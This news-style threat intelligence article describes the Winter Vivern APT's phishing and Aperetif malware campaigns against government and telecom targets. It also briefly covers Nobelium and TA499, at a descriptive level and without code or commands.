The advanced persistent threat (APT) group known as Winter Vivern has increasingly targeted governmental entities across regions, including India, Lithuania, Slovakia, and the Vatican, with campaigns dating back to 2021. Reports from SentinelOne indicate that among the specific targets are Polish government agencies, the Ukrainian Ministry of Foreign Affairs, and individuals within the Indian government.
One significant aspect of this APT’s operations is its focus on private businesses, especially telecommunications companies involved in supporting Ukraine during the ongoing conflict. Tom Hegel, a senior threat researcher at SentinelOne, highlighted the group’s specific interest in these sectors, noting their strategic approach.
Winter Vivern, also identified as UAC-0114, gained attention recently following a report from Ukraine’s Computer Emergency Response Team (CERT-UA), which outlined a malicious campaign delivering malware called Aperetif to state authorities in Ukraine and Poland. Previous investigations revealed the group’s use of weaponized Microsoft Excel documents containing XLM macros, enabling them to execute PowerShell implants on victims’ machines.
Though the origins of Winter Vivern remain ambiguous, their attack methods suggest alignment with the geopolitical objectives of Belarus and Russia. Their tactics encompass a wide range of approaches, such as phishing websites and malicious documents tailored to specific targets, aimed at distributing customized payloads and gaining unauthorized access to sensitive systems.
In a campaign observed during mid-2022, Winter Vivern established credential phishing sites to target users of the Indian government’s legitimate email service. The attack chain typically involves the usage of batch scripts disguised as antivirus tools to deploy the Aperetif trojan from compromised infrastructure such as hacked WordPress sites.
The Aperetif malware, developed in Visual C++, is engineered to collect victim data, maintain persistent backdoor access, and retrieve additional payloads from its command-and-control (C2) server. Hegel characterizes the group as resource-limited yet highly innovative, exhibiting restraint in their operational scope while showcasing significant sophistication in their targeting of government and high-value private sector entities.
In contrast to Winter Vivern’s low profile, another Russian-backed group, Nobelium (linked to APT29), continues to garner attention for its high-profile cyber operations, including the much-discussed SolarWinds supply chain compromise. Nobelium has been implicated in phishing campaigns directed at European Union diplomatic entities, particularly those assisting Ukrainian refugees and their government. Their tactics have involved weaponized emails that lead to HTML files and utilize legitimate online services for hosting malicious content.
As highlighted by Microsoft, Nobelium remains highly active, executing simultaneous campaigns aimed at government organizations, NGOs, intergovernmental organizations, and think tanks within the U.S., Europe, and Central Asia. The threats are compounded by aggressive email campaigns from another Russia-aligned group, TA499, known for targeting high-profile individuals who publicly discuss Russian disinformation efforts.
The interplay of these various APT activities raises substantial concerns among cybersecurity professionals. The use of tactics detailed within the MITRE ATT&CK framework, such as initial access via phishing and credential harvesting, persistence through malware installation, and the elevation of privileges to navigate sensitive environments, underline the complexity of these threat landscapes. Business leaders are urged to remain vigilant and informed about evolving cyber threats that could impact their operations.
